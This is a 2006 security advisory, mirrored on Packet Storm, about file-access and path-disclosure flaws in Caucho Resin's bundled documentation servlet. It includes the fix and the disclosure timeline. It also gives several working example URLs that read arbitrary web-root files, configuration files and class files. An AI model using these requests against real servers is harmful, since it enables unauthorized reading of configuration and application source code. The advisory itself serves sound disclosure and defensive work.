Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormScanalert.comPACKETSTORM:46470
HistoryMay 22, 2006 - 12:00 a.m.

sa-caucho.txt

2006-05-2200:00:00
scanalert.com
packetstormsecurity.com
36
JSON
`ScanAlert Security Advisory  
http://www.scanalert.com  
  
Caucho Resin Multiple Vulnerabilities - Arbitrary File Access & Information  
Disclosure  
  
Date: 5/16/06  
Vendor: Caucho  
Package: Resin  
Version: 3.0.17 and 3.0.18 – Vendor Confirmed  
Credit: ScanAlert’s Security and Enterprise Services Teams.  
  
Risk:  
Common Vulnerability Scoring System (CVSS) -  
http://www.first.org/cvss/intro/  
  
Related Exploit Range: Remote  
Attack Complexity: Low   
Level Of Authentication Needed: Not Required   
Confidentiality Impact: Partial   
Integrity Impact: Partial   
Availability Impact: None  
  
Overview  
  
Caucho Resin is a high performance, Sun certified J2EE server featuring load  
balancing for increased reliability. Resin is well known for its flexibility  
and ease of use, saving both engineering time and staff costs.   
  
Vulnerabilities  
  
Resin contains documentation that is available in the /webapps directory and  
is an expanded war file available at /resin-doc by default when using the  
standard resin.conf and Resin directory structure for configuring the  
application.   
  
This documentation contains a servlet for viewing files within the  
integrated tutorial:  
  
http://targetsystem/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftut  
orial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp&re-marker=&re-start=&r  
e-end=#code-highlight  
  
The viewfile servlet can easily read any file within the web root with no  
parameters:  
  
http://targetsystem/resin-doc/viewfile/?file=index.jsp  
  
It is possible to set the context path outside of the resin-doc and read any  
file on alternate web roots:  
  
http://targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath  
=&file=WEB-INF/web.xml  
  
When resin-doc is installed on a system it is possible to read all files  
contained within the web root including class files which can then be  
decompiled to view the Java source:  
  
http://targetsystem/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-  
INF/classes/com/webapp/app/target.class  
  
An incorrect path in the request will reveal the absolute installation path:  
  
File not found  
/C:/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-exist  
ant.class  
  
Solution:   
  
Remove the resin-doc.war file from all production systems and do not deploy  
using default configuration files. Upgrade to version 3.0.19 or better.  
  
Resolution Timeline:  
  
Vendor Notification: May 5, 2006  
Vendor Response: May 9, 2006  
Vendor Fix: May 15, 2006  
Coordinated public release of advisory: May 16, 2006  
----------------------------------------------------------------------------  
--------------------------  
  
ScanAlert's mission is to make the web safe from hackers.  
  
We make web sites secure from hackers and certify it to their customers via  
our patent pending HACKER SAFE® security certification technology. Our daily  
security audits and real-time certification enables consumers to know  
whether the sites where they shop are taking the necessary steps to  
safeguard their personal information from hackers. By alleviating consumers'  
fears of identity theft and credit card fraud, online merchants who earn  
HACKER SAFE certification consistently see substantial increases in online  
transactions  
  
For additional information regarding ScanAlert and the Hacker Safe program  
please contact:  
  
Joseph Pierini, CISSP | Director, Enterprise Services  
ScanAlert ( www.scanalert.com)  
860 Napa Valley Corporate Way  
Suite R  
Napa, CA 94558  
Phone: 877 302-9965   
Int'l: 707 224-7656   
Fax: 707 252-9626  
Email: [email protected]  
  
  
`
JSON